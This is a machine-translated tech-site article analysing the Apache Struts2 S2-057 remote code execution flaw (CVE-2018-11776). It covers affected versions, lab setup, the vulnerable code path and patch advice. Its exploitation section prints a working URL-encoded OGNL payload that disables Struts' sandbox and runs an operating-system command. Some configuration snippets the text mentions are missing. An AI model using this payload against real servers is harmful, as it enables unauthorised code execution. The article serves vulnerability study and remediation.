Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the example analysis of Apache Struts2 S2-057 remote code execution vulnerabilities, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

First, background introduction

Apache Struts framework is an open source project based on Java Servlets,JavaBeans and JavaServer Pages (JSP) Web application framework. Struts is based on Model-View-Controller (MVC) design pattern and can be used to component complex Web applications.

It allows us to decompose the business logic, control logic and presentation logic of an application to make it more reusable and maintainable. The Struts framework is part of the Jakarta project and is managed by the Apache Software Foundation.

1.1 vulnerability description

When struts.mapper.alwaysSelectFullNamespace is set to true, and the missing namespace value of the package tab and the param tab of result, or the use of wildcards can cause namespace to be controlled, and eventually namespace will be brought into OGNL statement execution, resulting in a remote code execution vulnerability.

1.2 affected system version

Apache Struts 2.3-Struts 2.3.34

Apache Struts 2.5-Struts 2.5.16

1.3 vulnerability number

CVE-2018-11776

Second, environmental construction

1. Download: http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip

two。 Modify the configuration file struts-actionchaining.xml

There are several attack vectors for this vulnerability, including:

2.1 Redirect action

2.2 Action chaining

2.3 Postback result

Take the first as an example, modify the content of the configuration file to

Third, details of the loophole

In the parseNameAndNamespace method of the class DefaultActionMapper.

When alwaysSelectFullNamespace is set to true, the value of namespace is obtained from URL. URL is controllable, so namespace is also controllable.

After the Action execution is finished, the program calls the execute () method in the ServletActionRedirectResult class to parse the redirect Result.

First, when namespace is empty, call invocation.getProxy (). GetNamespace () to assign the variable namespace, and then pass the variable namespace into the ActionMapping constructor.

ActionMapper.getUriFromActionMapping () then reassembles the value after ActionMapping to generate a URL string (including namespace) and assigns a value to the tmplocation variable.

The tmplocation with namespace is then passed into the setLocation () method.

This method assigns the tmplocation value to the location variable in the StrutsResultSupport class.

Then, track the super.execute () method.

Continue to trace super.execute () in the ServletActionResult class.

In the execute () method in the StrutsResultSupport class, the location variable (with namespace) that has just been assigned is passed in the conditionalParse () method.

Finally, OGNL parsing of namespace through TextParseUtil.translateVariables () results in a remote code execution vulnerability.

IV. Vulnerability exploitation

1. Access the address whose url is / ${(111y111)} / actionChain1.action.

Access triggers OGNL expression, url becomes / 222/register2.action, vulnerability exists.

2. Payload:

% 24% 7b (% 23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS). (% 23ct%3d%23request%5b%27struts.valueStack%27%5d.context). (% 23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d). (% 23ou%3d%23cr.getInstance (% 40com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (% 23ou.getExcludedPackageNames (). Clear ()). (% 23ou.getExcludedClasses (). Clear ()). 23ct.setMemberAccess (% 23dm). (% 23cmd%3d%40java.lang.Runtime%40getRuntime () .exec (% 22calc%22))% 7d

This payload is only available for version 2.3 series.

V. suggestions for restoration

Official patch

The latest version has been officially released to fix this vulnerability. Affected users should upgrade to Apache Struts 2.3.35 or Struts 2.5.17 as soon as possible.

Https://struts.apache.org/download.cgi#struts2517

Manual repair

Modify the configuration file:

Fix the namespace value of the package tag and result's param tag, and prohibit the use of wildcards.

After reading the above, do you have any further understanding of Apache Struts2 S2-057 remote code execution vulnerability example analysis? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.